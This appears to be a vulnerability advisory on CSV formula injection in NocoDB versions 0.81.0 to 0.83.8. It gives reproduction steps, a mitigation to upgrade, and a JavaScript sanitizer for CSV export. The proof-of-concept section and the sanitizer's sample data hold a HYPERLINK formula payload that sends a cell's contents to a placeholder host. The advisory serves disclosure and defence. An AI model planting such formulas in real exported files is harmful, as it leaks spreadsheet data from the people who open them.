Overview
NocoDB versions 0.81.0 through 0.83.8 are affected by a CSV Injection (Formula Injection) vulnerability. A low-privileged attacker can create a new table and inject payloads into its rows. When an administrator accesses the User Management endpoint, exports the data as a CSV file, and opens it, the payload gets executed.
Details
NocoDB's download as CSV functionality fails to sanitize user-controlled input before writing it to the downloaded CSV file, which leads to a formula injection vulnerability.
PoC Details
Sign in to the NocoDB application as a lower-privileged user, such as an editor, and create a new table. Create a new row in this table with its value set to the formula injection payload shown below. Then click download as CSV, which triggers the formula injection vulnerability.
PoC Code
=HYPERLINK("http://0.0.0.0:8000/?leak="&A1,"click")
Affected Environments
0.81.0 through 0.83.8
Prevention
Update to version 0.84.0 or later
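For exporters that cannot be upgraded immediately, or for similar CSV export code, the missing sanitization described under Details can be illustrated as follows. This is an added example, not NocoDB's code or its actual fix; the function names and sample rows are constructed, and the trigger list follows OWASP's CSV Injection guidance.

```javascript
// Added example: neutralise spreadsheet formulas when exporting rows to CSV.
// Function names and sample rows are constructed for illustration.

// Leading characters that make a spreadsheet evaluate a cell as a formula.
const FORMULA_TRIGGERS = ['=', '+', '-', '@', '\t', '\r'];

function neutralizeCell(value) {
  if (value === null || value === undefined) return '';
  // Real numbers are emitted as-is so negative values such as -5 stay numeric.
  if (typeof value === 'number') return String(value);
  const text = String(value);
  // Some spreadsheet apps skip leading spaces, so also test the first
  // non-whitespace character, not only the very first one.
  const firstVisible = text.trimStart().charAt(0);
  if (FORMULA_TRIGGERS.includes(text.charAt(0)) || FORMULA_TRIGGERS.includes(firstVisible)) {
    return "'" + text; // leading apostrophe forces the cell to be read as text
  }
  return text;
}

// RFC 4180 quoting: wrap the field in quotes when needed, double embedded quotes.
function quoteField(text) {
  return /[",\r\n]/.test(text) ? '"' + text.replace(/"/g, '""') + '"' : text;
}

// neutralize=false reproduces the unsafe behaviour: values are only quoted.
function toCsv(rows, { neutralize = true } = {}) {
  return rows
    .map((row) =>
      row.map((cell) => quoteField(neutralize ? neutralizeCell(cell) : String(cell ?? ''))).join(','))
    .join('\r\n');
}

// Constructed sample data; the first data row carries the payload from this page.
const sampleRows = [
  ['Title', 'Amount'],
  ['=HYPERLINK("http://0.0.0.0:8000/?leak="&A1,"click")', -5],
  ['  =1+1', 10],
  ['plain text', 3],
];

console.log(toCsv(sampleRows, { neutralize: false })); // parsed cell still begins with "="
console.log(toCsv(sampleRows)); // formula-like cells are prefixed with an apostrophe
```

CSV quoting alone does not help, because the spreadsheet evaluates the cell after the quotes have been parsed away; the neutralization has to change the first character of the cell's value.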